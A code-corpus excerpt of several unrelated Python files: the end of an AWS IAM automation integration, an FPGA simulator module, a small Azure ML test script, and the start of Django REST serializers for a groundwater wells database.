'PolicyArn': args.get('policyArn'),
'VersionId': version['VersionId'],
'IsDefaultVersion': version['IsDefaultVersion'],
'CreateDate': datetime.strftime(version['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies(val.PolicyArn === obj.PolicyArn).Versions': data}
human_readable = tableToMarkdown('AWS IAM Policy Versions', data)
return_outputs(human_readable, ec)
def get_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
data = []
kwargs = {
'PolicyArn': args.get('policyArn'),
'VersionId': args.get('versionId')
}
response = client.get_policy_version(**kwargs)
version = response['PolicyVersion']
data.append({
'PolicyArn': args.get('policyArn'),
'Document': version['Document'],
'VersionId': version['VersionId'],
'IsDefaultVersion': version['IsDefaultVersion'],
'CreateDate': datetime.strftime(version['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
})
ec = {'AWS.IAM.Policies(val.PolicyArn === obj.PolicyArn).Versions': data}
human_readable = tableToMarkdown('AWS IAM Policy Version', data)
return_outputs(human_readable, ec)
def set_default_policy_version(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'PolicyArn': args.get('policyArn'),
'VersionId': args.get('versionId')
}
response = client.set_default_policy_version(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Default Policy Version was set to {0}".format(args.get('versionId')))
def create_account_alias(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'AccountAlias': args.get('accountAlias')}
response = client.create_account_alias(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Account Alias was created")
def delete_account_alias(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'AccountAlias': args.get('accountAlias')}
response = client.delete_account_alias(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Account Alias was deleted")
def get_account_password_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
response = client.get_account_password_policy()
data = response['PasswordPolicy']
raw = json.loads(json.dumps(response['PasswordPolicy'], cls=DatetimeEncoder))
ec = {'AWS.IAM.PasswordPolicy': raw}
human_readable = tableToMarkdown('AWS IAM Account Password Policy', data)
return_outputs(human_readable, ec)
def update_account_password_policy(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
try:
response = client.get_account_password_policy()
kwargs = response['PasswordPolicy']
except client.exceptions.NoSuchEntityException:
kwargs = {}
# ExpirePasswords is part of the response but cannot be included
# in the request
if 'ExpirePasswords' in kwargs:
kwargs.pop('ExpirePasswords')
if args.get('minimumPasswordLength'):
kwargs.update({'MinimumPasswordLength': int(args.get('minimumPasswordLength'))})
if args.get('requireSymbols'):
kwargs.update({'RequireSymbols': True if args.get('requireSymbols') == 'True' else False})
if args.get('requireNumbers'):
kwargs.update({'RequireNumbers': True if args.get('requireNumbers') == 'True' else False})
if args.get('requireUppercaseCharacters'):
kwargs.update(
{'RequireUppercaseCharacters': True if args.get('requireUppercaseCharacters') == 'True' else False})
if args.get('requireLowercaseCharacters'):
kwargs.update(
{'RequireLowercaseCharacters': True if args.get('requireLowercaseCharacters') == 'True' else False})
if args.get('allowUsersToChangePassword'):
kwargs.update(
{'AllowUsersToChangePassword': True if args.get('allowUsersToChangePassword') == 'True' else False})
if args.get('maxPasswordAge'):
kwargs.update({'MaxPasswordAge': int(args.get('maxPasswordAge'))})
if args.get('passwordReusePrevention'):
kwargs.update({'PasswordReusePrevention': int(args.get('passwordReusePrevention'))})
if args.get('hardExpiry'):
kwargs.update({'HardExpiry': True if args.get('hardExpiry') == 'True' else False})
response = client.update_account_password_policy(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("The Account Password Policy was updated")
def test_function():
client = aws_session()
response = client.list_users()
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results('ok')
'''EXECUTION BLOCK'''
try:
LOG('Command being called is {command}'.format(command=demisto.command()))
if demisto.command() == 'test-module':
test_function()
elif demisto.command() == 'aws-iam-create-user':
create_user(demisto.args())
elif demisto.command() == 'aws-iam-create-login-profile':
create_login_profile(demisto.args())
elif demisto.command() == 'aws-iam-get-user':
get_user(demisto.args())
elif demisto.command() == 'aws-iam-list-users':
list_users(demisto.args())
elif demisto.command() == 'aws-iam-update-user':
update_user(demisto.args())
elif demisto.command() == 'aws-iam-delete-user':
delete_user(demisto.args())
elif demisto.command() == 'aws-iam-update-login-profile':
update_login_profile(demisto.args())
elif demisto.command() == 'aws-iam-create-group':
create_group(demisto.args())
elif demisto.command() == 'aws-iam-list-groups':
list_groups(demisto.args())
elif demisto.command() == 'aws-iam-list-groups-for-user':
list_groups_for_user(demisto.args())
elif demisto.command() == 'aws-iam-create-access-key':
create_access_key(demisto.args())
elif demisto.command() == 'aws-iam-update-access-key':
update_access_key(demisto.args())
elif demisto.command() == 'aws-iam-list-access-keys-for-user':
list_access_key_for_user(demisto.args())
elif demisto.command() == 'aws-iam-list-policies':
list_policies(demisto.args())
elif demisto.command() == 'aws-iam-list-roles':
list_roles(demisto.args())
elif demisto.command() == 'aws-iam-attach-policy':
attach_policy(demisto.args())
elif demisto.command() == 'aws-iam-detach-policy':
detach_policy(demisto.args())
elif demisto.command() == 'aws-iam-delete-login-profile':
delete_login_profile(demisto.args())
elif demisto.command() == 'aws-iam-add-user-to-group':
add_user_to_group(demisto.args())
elif demisto.command() == 'aws-iam-delete-group':
delete_group(demisto.args())
elif demisto.command() == 'aws-iam-remove-user-from-group':
remove_user_from_group(demisto.args())
elif demisto.command() == 'aws-iam-delete-access-key':
delete_access_key(demisto.args())
elif demisto.command() == 'aws-iam-create-instance-profile':
create_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-delete-instance-profile':
delete_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-list-instance-profiles':
list_instance_profiles(demisto.args())
elif demisto.command() == 'aws-iam-add-role-to-instance-profile':
add_role_to_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-remove-role-from-instance-profile':
remove_role_from_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-list-instance-profiles-for-role':
list_instance_profiles_for_role(demisto.args())
elif demisto.command() == 'aws-iam-get-instance-profile':
get_instance_profile(demisto.args())
elif demisto.command() == 'aws-iam-get-role':
get_role(demisto.args())
elif demisto.command() == 'aws-iam-delete-role':
delete_role(demisto.args())
elif demisto.command() == 'aws-iam-create-role':
create_role(demisto.args())
elif demisto.command() == 'aws-iam-create-policy':
create_policy(demisto.args())
elif demisto.command() == 'aws-iam-delete-policy':
delete_policy(demisto.args())
elif demisto.command() == 'aws-iam-create-policy-version':
create_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-delete-policy-version':
delete_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-list-policy-versions':
list_policy_versions(demisto.args())
elif demisto.command() == 'aws-iam-get-policy-version':
get_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-set-default-policy-version':
set_default_policy_version(demisto.args())
elif demisto.command() == 'aws-iam-create-account-alias':
create_account_alias(demisto.args())
elif demisto.command() == 'aws-iam-delete-account-alias':
delete_account_alias(demisto.args())
elif demisto.command() == 'aws-iam-get-account-password-policy':
get_account_password_policy(demisto.args())
elif demisto.command() == 'aws-iam-update-account-password-policy':
update_account_password_policy(demisto.args())
except ResponseParserError as e:
return_error(
'Could not connect to the AWS endpoint. Please check that the region is valid.\n {error}'.format(
error=type(e)))
LOG(str(e))
except Exception as e:
LOG(str(e))
return_error('Error has occurred in the AWS IAM Integration: {code}\n {message}'.format(
code=type(e), message=str(e)))
| 38.467498 | 112 | 0.633649 |
77cfe2e4a2c9b478300944f02fc01b445e2a3d79 | 10,648 | py | Python | bundle/fpga_simu.py | davidbrochart/bundle | 9e6a14fa48e4d22a2cbc8239b13e600a86c5e5b0 | [
"MIT"
] | 4 | 2018-09-15T08:30:14.000Z | 2019-03-11T20:56:25.000Z | bundle/fpga_simu.py | davidbrochart/bundle | 9e6a14fa48e4d22a2cbc8239b13e600a86c5e5b0 | [
"MIT"
] | null | null | null | bundle/fpga_simu.py | davidbrochart/bundle | 9e6a14fa48e4d22a2cbc8239b13e600a86c5e5b0 | [
"MIT"
] | 1 | 2022-03-14T02:01:16.000Z | 2022-03-14T02:01:16.000Z | from pyclk import Sig, Reg, In, Out, List, Module
from .memory import memory
from .ddr2fpga import ddr2fpga
from .fpga2ddr import fpga2ddr
from .iterator import iterator
from .functions import func
from .fpga_state import FPGA_state
from random import randint
import asyncio
import numpy as np
class Simu(Module):
def __init__(self, fpga_config):
self.func_layout = fpga_config.func_layout
self.mem_nb = fpga_config.config['mem_nb']
self.ddr2fpga_nb = fpga_config.config['ddr2fpga_nb']
self.fpga2ddr_nb = fpga_config.config['fpga2ddr_nb']
self.func_nb = fpga_config.config['func_nb']
self.iter_nb = fpga_config.config['iter_nb']
self.mem_depth = fpga_config.config['mem_depth']
self.chunk_array = [[0 for j in range(fpga_config.config['mem_depth'])] for i in range(fpga_config.config['mem_nb'])]
#self.chunk_array = [np.zeros(fpga_config.config['mem_depth'], dtype=np.uint64) for i in range(fpga_config.config['mem_nb'])]
self.cycle_nb = -1
self.randmax = 2
self.trace = None
# memories
self.u_mem = List()
self.s_mem_wena = List()
self.s_mem_addr = List()
self.s_mem_din = List()
self.s_mem_dout = List()
for i in range(self.mem_nb):
self.s_mem_wena[i] = Sig()
self.s_mem_addr[i] = Sig()
self.s_mem_din[i] = Sig()
self.s_mem_dout[i] = Sig()
self.u_mem[i] = _ = memory(self.mem_depth)
_.i_wena (self.s_mem_wena[i])
_.i_addr (self.s_mem_addr[i])
_.i_din (self.s_mem_din[i])
_.o_dout (self.s_mem_dout[i])
# ddr2fpga
self.u_ddr2fpga = List()
self.s_ddr2fpga_mem_i = List()
self.s_ddr2fpga_data_nb = List()
self.s_ddr2fpga_done = List()
self.s_ddr2fpga_wena = List()
self.s_ddr2fpga_addr = List()
self.s_ddr2fpga_din = List()
for i in range(self.ddr2fpga_nb):
self.s_ddr2fpga_mem_i[i] = Sig()
self.s_ddr2fpga_data_nb[i] = Sig()
self.s_ddr2fpga_done[i] = Sig()
self.s_ddr2fpga_wena[i] = Sig()
self.s_ddr2fpga_addr[i] = Sig()
self.s_ddr2fpga_din[i] = Sig()
self.u_ddr2fpga[i] = _ = ddr2fpga()
_.i_data_nb (self.s_ddr2fpga_data_nb[i])
_.o_done (self.s_ddr2fpga_done[i])
_.o_mem_wena (self.s_ddr2fpga_wena[i])
_.o_mem_addr (self.s_ddr2fpga_addr[i])
_.o_mem_din (self.s_ddr2fpga_din[i])
# fpga2ddr
self.s_fpga2ddr_mem_i = List()
self.s_fpga2ddr_data_nb = List()
self.s_fpga2ddr_done = List()
self.s_fpga2ddr_addr = List()
self.s_fpga2ddr_mem_dout = List()
self.u_fpga2ddr = List()
for i in range(self.fpga2ddr_nb):
self.s_fpga2ddr_mem_dout[i] = Sig()
self.s_fpga2ddr_addr[i] = Sig()
self.s_fpga2ddr_mem_i[i] = Sig()
self.s_fpga2ddr_data_nb[i] = Sig()
self.s_fpga2ddr_done[i] = Sig()
self.u_fpga2ddr[i] = _ = fpga2ddr()
_.i_data_nb (self.s_fpga2ddr_data_nb[i])
_.o_done (self.s_fpga2ddr_done[i])
_.o_mem_addr (self.s_fpga2ddr_addr[i])
_.i_mem_dout (self.s_fpga2ddr_mem_dout[i])
# iterators
self.u_iter = List()
self.s_iter_data_nb = List()
self.s_iter_done = List()
self.s_iter_raddr = List()
self.s_iter_waddr = List()
self.s_iter_wena = List()
self.s_iter_arg_valid = List()
self.s_iter_res_valid = List()
for i in range(self.iter_nb):
self.s_iter_data_nb[i] = Sig()
self.s_iter_done[i] = Sig()
self.s_iter_raddr[i] = Sig()
self.s_iter_waddr[i] = Sig()
self.s_iter_wena[i] = Sig()
self.s_iter_arg_valid[i] = Sig()
self.s_iter_res_valid[i] = Sig()
self.u_iter[i] = _ = iterator()
_.i_data_nb (self.s_iter_data_nb[i])
_.o_done (self.s_iter_done[i])
_.o_raddr (self.s_iter_raddr[i])
_.o_waddr (self.s_iter_waddr[i])
_.o_wena (self.s_iter_wena[i])
_.o_arg_valid (self.s_iter_arg_valid[i])
_.i_res_valid (self.s_iter_res_valid[i])
# functions
self.u_func = List()
self.s_func_arg0 = List()
self.s_func_arg1 = List()
self.s_func_arg_valid = List()
self.s_func_res = List()
self.s_func_res_valid = List()
i = 0
for fname, fnb in self.func_layout.items():
for j in range(fnb):
self.s_func_arg0[i] = Sig()
self.s_func_arg1[i] = Sig()
self.s_func_arg_valid[i] = Sig()
self.s_func_res[i] = Sig()
self.s_func_res_valid[i] = Sig()
self.u_func[i] = _ = func(fname)
_.i_arg0 (self.s_func_arg0[i])
_.i_arg1 (self.s_func_arg1[i])
_.i_arg_valid (self.s_func_arg_valid[i])
_.o_res (self.s_func_res[i])
_.o_res_valid (self.s_func_res_valid[i])
i += 1
self.s_iter_rmem0_i = List()
self.s_iter_rmem1_i = List()
self.s_iter_wmem_i = List()
self.s_iter_func_i = List()
for i in range(self.iter_nb):
self.s_iter_rmem0_i[i] = Sig()
self.s_iter_rmem1_i[i] = Sig()
self.s_iter_wmem_i[i] = Sig()
self.s_iter_func_i[i] = Sig()
self.state = FPGA_state(fpga_config)
self.config = fpga_config.config
def logic(self):
# DDR <-> memory
for i in range(self.mem_nb):
self.s_mem_addr[i].d = 0
self.s_mem_din[i].d = 0
self.s_mem_wena[i].d = 0
for i in range(self.fpga2ddr_nb):
self.s_mem_addr[self.s_fpga2ddr_mem_i[i].d].d += self.s_fpga2ddr_addr[i].d
self.s_fpga2ddr_mem_dout[i].d = self.s_mem_dout[self.s_fpga2ddr_mem_i[i].d].d
for i in range(self.ddr2fpga_nb):
self.s_mem_wena[self.s_ddr2fpga_mem_i[i].d].d += self.s_ddr2fpga_wena[i].d
self.s_mem_addr[self.s_ddr2fpga_mem_i[i].d].d += self.s_ddr2fpga_addr[i].d
self.s_mem_din[self.s_ddr2fpga_mem_i[i].d].d += self.s_ddr2fpga_din[i].d
# memory <-> iterator <-> function
for i in range(self.func_nb):
self.s_func_arg_valid[i].d = 0
self.s_func_arg0[i].d = 0
self.s_func_arg1[i].d = 0
for i in range(self.iter_nb):
self.s_mem_addr[self.s_iter_rmem0_i[i].d].d += self.s_iter_raddr[i].d
self.s_mem_addr[self.s_iter_rmem1_i[i].d].d += self.s_iter_raddr[i].d
self.s_mem_addr[self.s_iter_wmem_i[i].d].d += self.s_iter_waddr[i].d
self.s_mem_wena[self.s_iter_wmem_i[i].d].d += self.s_iter_wena[i].d
self.s_func_arg_valid[self.s_iter_func_i[i].d].d += self.s_iter_arg_valid[i].d
self.s_iter_res_valid[i].d = self.s_func_res_valid[self.s_iter_func_i[i].d].d
if self.s_iter_data_nb[i].d != 0:
self.s_mem_din[self.s_iter_wmem_i[i].d].d += self.s_func_res[self.s_iter_func_i[i].d].d
if self.s_iter_arg_valid[i].d == 1:
self.s_func_arg0[self.s_iter_func_i[i].d].d += self.s_mem_dout[self.s_iter_rmem0_i[i].d].d
self.s_func_arg1[self.s_iter_func_i[i].d].d += self.s_mem_dout[self.s_iter_rmem1_i[i].d].d
def set_cycle_nb(self, cycle_nb=-1):
self.cycle_nb = cycle_nb
def set_trace(self, trace):
self.trace = trace
async def op(self, iter_i, func_i, rmem0_i, rmem1_i, wmem_i, data_nb):
# operation request
self.s_iter_data_nb[iter_i].d = data_nb
self.s_iter_func_i[iter_i].d = func_i
self.s_iter_rmem0_i[iter_i].d = rmem0_i
self.s_iter_rmem1_i[iter_i].d = rmem1_i
self.s_iter_wmem_i[iter_i].d = wmem_i
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
# operation completion check
# software is polling, run the FPGA
done = False
while not done:
if (self.cycle_nb >= 0) and (self.time >= self.cycle_nb):
return
if self.s_iter_done[iter_i].d == 1:
self.s_iter_data_nb[iter_i].d = 0
done = True
else:
done = False
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
await asyncio.sleep(0)
async def ddr2fpga(self, ddr2fpga_i, mem_i, array_ptr, data_nb):
# memory write
self.s_ddr2fpga_mem_i[ddr2fpga_i].d = mem_i
self.s_ddr2fpga_data_nb[ddr2fpga_i].d = data_nb
self.u_ddr2fpga[ddr2fpga_i].array_ptr = array_ptr
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
# memory copy completion check
# software is polling, run the FPGA
done = False
while not done:
if (self.cycle_nb >= 0) and (self.time >= self.cycle_nb):
return
if self.s_ddr2fpga_done[ddr2fpga_i].d == 1:
self.s_ddr2fpga_data_nb[ddr2fpga_i].d = 0
done = True
else:
done = False
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
await asyncio.sleep(0)
async def fpga2ddr(self, fpga2ddr_i, mem_i, array_ptr, data_nb):
# memory read
self.s_fpga2ddr_mem_i[fpga2ddr_i].d = mem_i
self.s_fpga2ddr_data_nb[fpga2ddr_i].d = data_nb
self.u_fpga2ddr[fpga2ddr_i].array_ptr = array_ptr
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
# memory copy completion check
# software is polling, run the FPGA
done = False
while not done:
if (self.cycle_nb >= 0) and (self.time >= self.cycle_nb):
return
if self.s_fpga2ddr_done[fpga2ddr_i].d == 1:
self.s_fpga2ddr_data_nb[fpga2ddr_i].d = 0
done = True
else:
done = False
clkNb = randint(1, self.randmax)
self.run(clkNb=clkNb, trace=self.trace)
await asyncio.sleep(0)
| 40.030075 | 133 | 0.569121 |
535688dcc1be638fb3f4ac69eaf05a7fffab4d3e | 432 | py | Python | user/mutaz/test-aml.py | mutazag/imagecaptioning | 9933aebc750dfdb1d50d9e0a803acf24119a0cb3 | [
"MIT"
] | null | null | null | user/mutaz/test-aml.py | mutazag/imagecaptioning | 9933aebc750dfdb1d50d9e0a803acf24119a0cb3 | [
"MIT"
] | null | null | null | user/mutaz/test-aml.py | mutazag/imagecaptioning | 9933aebc750dfdb1d50d9e0a803acf24119a0cb3 | [
"MIT"
] | null | null | null | #conda activate py36
import sys
from azureml.core import VERSION
print("python version: " , sys.version)
print("azureml version: ", VERSION)
# enable logging
# https://docs.microsoft.com/en-us/azure/machine-learning/service/how-to-enable-logging
from azureml.core import Workspace, Experiment, Run
Workspace.create( )
exp = Experiment(workspace=, name='test_experiment')
run = exp.start_logging()
run.log("test-val", 10) | 19.636364 | 88 | 0.75 |
c2497e8ea4d4cb89e9c7996176c5fb54e6cd6756 | 41,627 | py | Python | app/backend/wells/serializers.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 37 | 2017-06-30T18:08:51.000Z | 2022-02-13T18:04:10.000Z | app/backend/wells/serializers.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 544 | 2017-06-21T00:29:20.000Z | 2022-02-01T21:37:38.000Z | app/backend/wells/serializers.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 59 | 2017-03-10T17:55:02.000Z | 2021-11-16T19:20:08.000Z | """
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import logging
from decimal import Decimal
from rest_framework import serializers
from django.db import transaction
from django.core.validators import MinValueValidator
from gwells.models import ProvinceStateCode
from gwells.serializers import AuditModelSerializer
from aquifers.serializers import HYDRAULIC_SUBTYPES
from registries.serializers import PersonNameSerializer, OrganizationNameListSerializer
from wells.models import (
ActivitySubmission,
ActivitySubmissionLinerPerforation,
AquiferLithologyCode,
Casing,
CasingMaterialCode,
CasingCode,
DecommissionDescription,
DrillingMethodCode,
LinerPerforation,
LithologyDescription,
Screen,
Well
)
from submissions.models import WellActivityCode
logger = logging.getLogger(__name__)
class CasingMaterialSerializer(serializers.ModelSerializer):
class Meta:
model = CasingMaterialCode
fields = (
'code',
'description'
)
class CasingCodeSerializer(serializers.ModelSerializer):
class Meta:
model = CasingCode
fields = (
'code',
'description',
)
class CasingSummarySerializer(serializers.ModelSerializer):
"""Serializes casings for well summary (using descriptions instead of codes)"""
casing_material = serializers.ReadOnlyField(source='casing_material.description')
casing_code = serializers.ReadOnlyField(source='casing_code.description')
class Meta:
model = Casing
fields = (
'start',
'end',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness'
)
class CasingSerializer(serializers.ModelSerializer):
length_required = serializers.BooleanField(required=False)
class Meta:
model = Casing
fields = (
'start',
'end',
'length_required',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness'
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
'diameter': {'required': True}
}
def to_representation(self, instance):
"""
Fetch many details related to a aquifer, used to generate its' summary page.
"""
ret = super().to_representation(instance)
ret['length_required'] = instance.start is not None and instance.end is not None
return ret
def validate(self, data):
"""
Check that start and end are set when the `requiredLength` parameter is true.
"""
data = super().validate(data)
if bool(data.get('length_required', True)):
errors = {}
start = data.get('start', None)
end = data.get('end', None)
if start == '' or start is None:
errors['start'] = 'This field is required.'
if end == '' or end is None:
errors['end'] = 'This field is required.'
if len(errors) != 0:
raise serializers.ValidationError(errors)
if 'length_required' in data:
del data['length_required']
return data
class CasingStackerSerializer(serializers.ModelSerializer):
class Meta:
model = Casing
fields = (
'start',
'end',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness',
'create_user',
'update_user'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'diameter': {'required': True},
'start': {'required': True},
'end': {'required': True},
'create_user': {'required': True},
'update_user': {'required': True}
}
class LegacyCasingSerializer(serializers.ModelSerializer):
# Serializers without validators:
start = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
end = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
diameter = serializers.DecimalField(max_digits=8, decimal_places=3, allow_null=True)
wall_thickness = serializers.DecimalField(max_digits=6, decimal_places=3, allow_null=True)
class Meta:
model = Casing
fields = (
'start',
'end',
'diameter',
'casing_code',
'casing_material',
'drive_shoe_status',
'wall_thickness'
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
'diameter': {'required': False},
'casing_code': {'required': False},
'casing_material': {'required': False},
'drive_shoe_status': {'required': False, 'allow_null': True},
'wall_thickness': {'required': False}
}
class DecommissionDescriptionSerializer(serializers.ModelSerializer):
"""Serializes Decommission Descriptions"""
class Meta:
model = DecommissionDescription
fields = (
'start',
'end',
'material',
'observations'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
}
class DecommissionDescriptionStackerSerializer(serializers.ModelSerializer):
"""Serializes Decommission Descriptions"""
class Meta:
model = DecommissionDescription
fields = (
'start',
'end',
'material',
'observations',
'create_user',
'update_user'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'create_user': {'required': True},
'update_user': {'required': True}
}
class LegacyDecommissionDescriptionSerializer(serializers.ModelSerializer):
"""Serializes Decommission Descriptions"""
class Meta:
model = DecommissionDescription
fields = (
'start',
'end',
'material',
'observations'
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
}
class ScreenSerializer(serializers.ModelSerializer):
class Meta:
model = Screen
fields = (
'start',
'end',
'diameter',
'assembly_type',
'slot_size',
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'assembly_type': {'required': True}
}
class ScreenStackerSerializer(serializers.ModelSerializer):
class Meta:
model = Screen
fields = (
'start',
'end',
'diameter',
'assembly_type',
'slot_size',
'create_user',
'update_user'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'assembly_type': {'required': True},
'create_user': {'required': True},
'update_user': {'required': True}
}
class LegacyScreenSerializer(serializers.ModelSerializer):
start = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
end = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
diameter = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
slot_size = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
class Meta:
model = Screen
fields = (
'start',
'end',
'diameter',
'assembly_type',
'slot_size',
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
'assembly_type': {'required': False}
}
class LinerPerforationSerializer(serializers.ModelSerializer):
class Meta:
model = LinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
# stuck on a particular well/submission (unless I gues you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
)
class LinerPerforationStackerSerializer(serializers.ModelSerializer):
""" This serializer is used for data->perforation(on well) and perforation(on well)->data.
"""
class Meta:
model = LinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
# stuck on a particular well/submission (unless I gues you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
'create_user',
'update_user'
)
extra_kwargs = {
'create_user': {'required': True},
'update_user': {'required': True}
}
class ActivitySubmissionLinerPerforationSerializer(serializers.ModelSerializer):
""" This serializer is used for data->perforation(on submission) and perforation(on submission)->data.
"""
class Meta:
model = ActivitySubmissionLinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
# stuck on a particular well/submission (unless I gues you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
)
class LegacyLinerPerforationSerializer(serializers.ModelSerializer):
class Meta:
model = ActivitySubmissionLinerPerforation
fields = (
# SUPER IMPORTANT: Don't include ID (liner_perforation_guid, well, or submission) as part of this
# serializer, as it will break the stacking code. If you include the guid, then it will remain
# stuck on a particular well/submission (unless I gues you pop it during serializing/
# deserializing) when creating legacy submissions or re-creating well records etc.
'start',
'end',
)
extra_kwargs = {
'start': {'required': False},
'end': {'required': False},
}
class LithologyDescriptionSummarySerializer(serializers.ModelSerializer):
"""Serializes lithology description records for the well summary, using descriptions instead of codes"""
lithology_description = serializers.ReadOnlyField(source='lithology_description.description')
lithology_colour = serializers.ReadOnlyField(source='lithology_colour.description')
lithology_hardness = serializers.ReadOnlyField(source='lithology_hardness.description')
lithology_moisture = serializers.ReadOnlyField(source='lithology_moisture.description')
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
)
class LithologyDescriptionSerializer(serializers.ModelSerializer):
start = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
end = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
"""Serializes lithology description records"""
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
)
class LithologyDescriptionStackerSerializer(serializers.ModelSerializer):
start = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
end = serializers.DecimalField(
max_digits=7, decimal_places=2,
validators=[MinValueValidator(Decimal('0.00'))])
"""Serializes lithology description records"""
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
'create_user',
'update_user'
)
extra_kwargs = {
'start': {'required': True},
'end': {'required': True},
'create_user': {'required': True},
'update_user': {'required': True}
}
class LegacyLithologyDescriptionSerializer(serializers.ModelSerializer):
end = serializers.DecimalField(max_digits=7, decimal_places=2, allow_null=True)
"""Serializes lithology description records"""
class Meta:
model = LithologyDescription
fields = (
'start',
'end',
'lithology_raw_data',
'lithology_colour',
'lithology_hardness',
'lithology_moisture',
'lithology_description',
'lithology_observation',
'water_bearing_estimated_flow',
)
extra_kwargs = {
'end': {'required': False, 'allow_null': True},
}
class DrillingMethodSummarySerializer(serializers.ModelSerializer):
""" serializes drilling methods for well summary display """
class Meta:
model = DrillingMethodCode
fields = ('description',)
class WellDetailSerializer(AuditModelSerializer):
casing_set = CasingSummarySerializer(many=True)
screen_set = ScreenSerializer(many=True)
linerperforation_set = LinerPerforationSerializer(many=True)
decommission_description_set = DecommissionDescriptionSerializer(many=True)
person_responsible = PersonNameSerializer()
company_of_person_responsible = OrganizationNameListSerializer()
lithologydescription_set = LithologyDescriptionSummarySerializer(many=True)
drilling_methods = DrillingMethodSummarySerializer(many=True)
# well vs. well_tag_number ; on submissions, we refer to well
well = serializers.IntegerField(source='well_tag_number')
# convert codes to their human-readable descriptions
